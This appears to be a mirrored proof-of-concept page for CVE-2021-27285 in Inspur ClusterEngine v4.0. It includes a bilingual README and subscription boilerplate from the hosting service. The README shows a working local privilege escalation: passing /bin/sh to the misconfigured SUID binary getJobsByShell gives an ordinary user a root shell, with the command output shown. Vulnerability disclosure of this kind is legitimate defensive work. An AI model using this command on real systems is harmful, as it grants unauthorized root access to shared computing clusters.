CVE-2021-27285 PoC — Inspur ClusterEngine 安全漏洞

Source

https://github.com/fjh1997/CVE-2021-27285

Associated Vulnerability

Title:Inspur ClusterEngine 安全漏洞 (CVE-2021-27285)
Description:An issue was discovered in Inspur ClusterEngine v4.0 that allows attackers to gain escalated Local privileges and execute arbitrary commands via /opt/tsce4/torque6/bin/getJobsByShell.

Readme

# CVE-2021-27285

浪潮ClusterEngine集群管理平台是专为浪潮天梭系列HPC产品定制的一款作业管理软件。浪潮ClusterEngine存在suid配置不当的问题，导致非管理员用户可以通过部分组件进行提权获得root权限。

浪潮clusterenginev4.0存在[组件](getJobsByShell)“/opt/tsce4/torque6/bin/getJobsByShell”suid配置不当问题，非管理员用户能通过suid提权方式获得root权限。

提权过程如下：

```bash
$ whoami  
user1  
$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh  
# whoami  
root  
#
```
修复建议：
升级相关组件

The Inspur ClusterEngine cluster management platform is a job management software specifically designed for Inspur TianSuo series HPC products. A misconfiguration in the SUID settings of Inspur ClusterEngine allows non-administrative users to escalate privileges and obtain root access through certain components.


Inspur ClusterEngine v4.0 has an improper SUID configuration issue with the [component](getJobsByShell) "/opt/tsce4/torque6/bin/getJobsByShell", allowing non-administrative users to escalate privileges and gain root access via the SUID mechanism.

The privilege escalation process is as follows:


```bash
$ whoami  
user1  
$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh  
# whoami  
root  
#
```
advisory：
patch the relevant components.

File Snapshot


 [4.0K]  /data/pocs/b7cc6625bd5a4ab4ae7cde3bce32ae5f654af028
├── [8.5K]  getJobsByShell
└── [1.3K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!